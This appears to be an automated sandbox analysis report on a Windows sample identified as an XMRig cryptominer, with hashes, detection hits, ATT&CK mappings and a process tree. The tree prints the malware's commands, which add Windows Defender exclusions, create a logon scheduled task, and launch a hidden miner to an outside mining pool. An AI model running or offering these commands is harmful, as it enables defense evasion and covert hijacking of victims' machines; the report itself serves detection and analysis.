xmrig | 98ced6e951485c45ebdeda3bbc04bd2918867e0490900b39789d9b4637a7409c

Analysis

max time kernel
382s
max time network
386s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
04/09/2024, 18:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test.exe
Size

29.7MB
MD5

531a4e282c420c64d7b545a9c4e0fb4d
SHA1

998d298e9ff967bec6f03bf8e8e8f03b4b3728db
SHA256

98ced6e951485c45ebdeda3bbc04bd2918867e0490900b39789d9b4637a7409c
SHA512

c1d8296e2ba1e1ca9e1860548b884414e2cde06c584c40a4306d248b9c9ccbbff7e55a717d742ea14cc849db41838cfa6feb7638d888c627ff95abcb13df6730
SSDEEP

786432:k99QkndbvqJ6+eH57FU4hxLq54xTxyCuYWQzJ2Mbvn:i1nM8hHxPhxO5iTECuYWQzJ7bv

Score

10^/10

xmrig execution miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 20 IoCs

miner

resource	yara_rule
behavioral2/memory/2936-51-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/2936-53-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/2936-46-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/2936-68-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/2936-66-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/2936-63-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/2936-61-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/2936-59-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/2936-57-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/2936-71-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/2936-74-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/2936-72-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/2936-70-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/2936-73-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/2936-55-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/2936-49-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/2936-75-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/2936-78-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/2936-79-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/2936-77-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2896	powershell.exe
2920	powershell.exe
2500	powershell.exe
2876	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2684	services64.exe

Loads dropped DLL 1 IoCs

pid	Process
2760	cmd.exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File created	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	conhost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2180 set thread context of 2936	2180	conhost.exe	46

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2840	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2896	powershell.exe
2920	powershell.exe
2500	powershell.exe
2876	powershell.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe
2936	svchost.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	2896	powershell.exe
Token: SeDebugPrivilege	2920	powershell.exe
Token: SeDebugPrivilege	2180	conhost.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	2876	powershell.exe
Token: SeLockMemoryPrivilege	2936	svchost.exe
Token: SeLockMemoryPrivilege	2936	svchost.exe

Suspicious use of WriteProcessMemory 54 IoCs

description	pid	Process	procid_target
PID 1744 wrote to memory of 2152	1744	test.exe	29
PID 1744 wrote to memory of 2152	1744	test.exe	29
PID 1744 wrote to memory of 2152	1744	test.exe	29
PID 1744 wrote to memory of 2152	1744	test.exe	29
PID 2152 wrote to memory of 2780	2152	conhost.exe	30
PID 2152 wrote to memory of 2780	2152	conhost.exe	30
PID 2152 wrote to memory of 2780	2152	conhost.exe	30
PID 2152 wrote to memory of 2844	2152	conhost.exe	32
PID 2152 wrote to memory of 2844	2152	conhost.exe	32
PID 2152 wrote to memory of 2844	2152	conhost.exe	32
PID 2780 wrote to memory of 2896	2780	cmd.exe	34
PID 2780 wrote to memory of 2896	2780	cmd.exe	34
PID 2780 wrote to memory of 2896	2780	cmd.exe	34
PID 2844 wrote to memory of 2840	2844	cmd.exe	35
PID 2844 wrote to memory of 2840	2844	cmd.exe	35
PID 2844 wrote to memory of 2840	2844	cmd.exe	35
PID 2780 wrote to memory of 2920	2780	cmd.exe	36
PID 2780 wrote to memory of 2920	2780	cmd.exe	36
PID 2780 wrote to memory of 2920	2780	cmd.exe	36
PID 2152 wrote to memory of 2760	2152	conhost.exe	37
PID 2152 wrote to memory of 2760	2152	conhost.exe	37
PID 2152 wrote to memory of 2760	2152	conhost.exe	37
PID 2760 wrote to memory of 2684	2760	cmd.exe	39
PID 2760 wrote to memory of 2684	2760	cmd.exe	39
PID 2760 wrote to memory of 2684	2760	cmd.exe	39
PID 2684 wrote to memory of 2180	2684	services64.exe	40
PID 2684 wrote to memory of 2180	2684	services64.exe	40
PID 2684 wrote to memory of 2180	2684	services64.exe	40
PID 2684 wrote to memory of 2180	2684	services64.exe	40
PID 2180 wrote to memory of 1076	2180	conhost.exe	41
PID 2180 wrote to memory of 1076	2180	conhost.exe	41
PID 2180 wrote to memory of 1076	2180	conhost.exe	41
PID 1076 wrote to memory of 2500	1076	cmd.exe	43
PID 1076 wrote to memory of 2500	1076	cmd.exe	43
PID 1076 wrote to memory of 2500	1076	cmd.exe	43
PID 1076 wrote to memory of 2876	1076	cmd.exe	45
PID 1076 wrote to memory of 2876	1076	cmd.exe	45
PID 1076 wrote to memory of 2876	1076	cmd.exe	45
PID 2180 wrote to memory of 2936	2180	conhost.exe	46
PID 2180 wrote to memory of 2936	2180	conhost.exe	46
PID 2180 wrote to memory of 2936	2180	conhost.exe	46
PID 2180 wrote to memory of 2936	2180	conhost.exe	46
PID 2180 wrote to memory of 2936	2180	conhost.exe	46
PID 2180 wrote to memory of 2936	2180	conhost.exe	46
PID 2180 wrote to memory of 2936	2180	conhost.exe	46
PID 2180 wrote to memory of 2936	2180	conhost.exe	46
PID 2180 wrote to memory of 2936	2180	conhost.exe	46
PID 2180 wrote to memory of 2936	2180	conhost.exe	46
PID 2180 wrote to memory of 2936	2180	conhost.exe	46
PID 2180 wrote to memory of 2936	2180	conhost.exe	46
PID 2180 wrote to memory of 2936	2180	conhost.exe	46
PID 2180 wrote to memory of 2936	2180	conhost.exe	46
PID 2180 wrote to memory of 2936	2180	conhost.exe	46
PID 2180 wrote to memory of 2936	2180	conhost.exe	46

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\test.exe
"C:\Users\Admin\AppData\Local\Temp\test.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1744
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\test.exe"
  2⤵
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:2152
- - C:\Windows\System32\cmd.exe
    "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2780
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2896
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2920
- - C:\Windows\System32\cmd.exe
    "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2844
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2840
- - C:\Windows\System32\cmd.exe
    "cmd" cmd /c "C:\Windows\system32\services64.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2760
  - - C:\Windows\system32\services64.exe
      C:\Windows\system32\services64.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2684
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
        5⤵
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2180
      - C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1076
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2500
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2876
      - C:\Windows\System32\svchost.exe
        
        C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:3333 --user=47nUe8D3z4bjgwqG9v4tKY3sBMcoEdvQ3iJMC8A8udU7DngaeR7hNhKETaaQD1iWhadw6j9iNWqf6fKiVcMy35kdVbxAzyD --pass= --cpu-max-threads-hint=60 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2936

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
c0a6f6bb3487857aa6d4ea1126dd4d7d

SHA1
7f184822523affb719c86244b31e8f5033fed4e4

SHA256
15aae6fdafb11c79efb48f0f1c99a3eba18b9f2d102428e461cf97370afe91d2

SHA512
b4b34cfedd78c2e7c3d7e23b8df7737c92967f3b6db3267bf99300d664ed6c5f2f81a1cc7b88d346fa3e70e8c479bd7191958df5567a2c3fbc178be622c46e2d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UAM7L4YUYL2ULU9MSRDY.temp

Filesize
7KB

MD5
b094557184777f3f6d900edb010357d7

SHA1
deb155fb4902abe7dbe76d39b53c4e4df551d6ea

SHA256
68bc416ac93515c602e009d39d0f9530da41d1cd004d522d804bf2d1466a7195

SHA512
3364e8f0f7dc40d9dd0e6f775caab0211b046ba152325819c2bf6361d228d8c80dddf15c7df0fcc9d6ee158edcd14a542c7a81343d995532923338261c3e2b96

Download Submit
\Windows\System32\services64.exe

Filesize
29.7MB

MD5
531a4e282c420c64d7b545a9c4e0fb4d

SHA1
998d298e9ff967bec6f03bf8e8e8f03b4b3728db

SHA256
98ced6e951485c45ebdeda3bbc04bd2918867e0490900b39789d9b4637a7409c

SHA512
c1d8296e2ba1e1ca9e1860548b884414e2cde06c584c40a4306d248b9c9ccbbff7e55a717d742ea14cc849db41838cfa6feb7638d888c627ff95abcb13df6730

Download Submit
memory/2152-20-0x000007FEF6323000-0x000007FEF6324000-memory.dmp

Filesize
4KB

Download
memory/2152-2-0x0000000020950000-0x0000000022706000-memory.dmp

Filesize
29.7MB

Download
memory/2152-6-0x000007FEF6320000-0x000007FEF6D0C000-memory.dmp

Filesize
9.9MB

Download
memory/2152-1-0x000007FEF6323000-0x000007FEF6324000-memory.dmp

Filesize
4KB

Download
memory/2152-5-0x000007FEF6320000-0x000007FEF6D0C000-memory.dmp

Filesize
9.9MB

Download
memory/2152-4-0x000007FEF6320000-0x000007FEF6D0C000-memory.dmp

Filesize
9.9MB

Download
memory/2152-0-0x00000000001F0000-0x0000000001FA6000-memory.dmp

Filesize
29.7MB

Download
memory/2152-27-0x000007FEF6320000-0x000007FEF6D0C000-memory.dmp

Filesize
9.9MB

Download
memory/2152-3-0x000007FEF6320000-0x000007FEF6D0C000-memory.dmp

Filesize
9.9MB

Download
memory/2152-21-0x000007FEF6320000-0x000007FEF6D0C000-memory.dmp

Filesize
9.9MB

Download
memory/2896-12-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/2896-11-0x000000001B750000-0x000000001BA32000-memory.dmp

Filesize
2.9MB

Download
memory/2920-18-0x000000001B750000-0x000000001BA32000-memory.dmp

Filesize
2.9MB

Download
memory/2920-19-0x0000000001D30000-0x0000000001D38000-memory.dmp

Filesize
32KB

Download
memory/2936-51-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2936-57-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2936-35-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2936-53-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2936-44-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2936-46-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2936-68-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2936-66-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2936-65-0x000007FFFFFDD000-0x000007FFFFFDE000-memory.dmp

Filesize
4KB

Download
memory/2936-69-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/2936-63-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2936-61-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2936-59-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2936-39-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2936-71-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2936-74-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2936-72-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2936-70-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2936-73-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2936-55-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2936-49-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2936-75-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2936-78-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2936-79-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2936-77-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download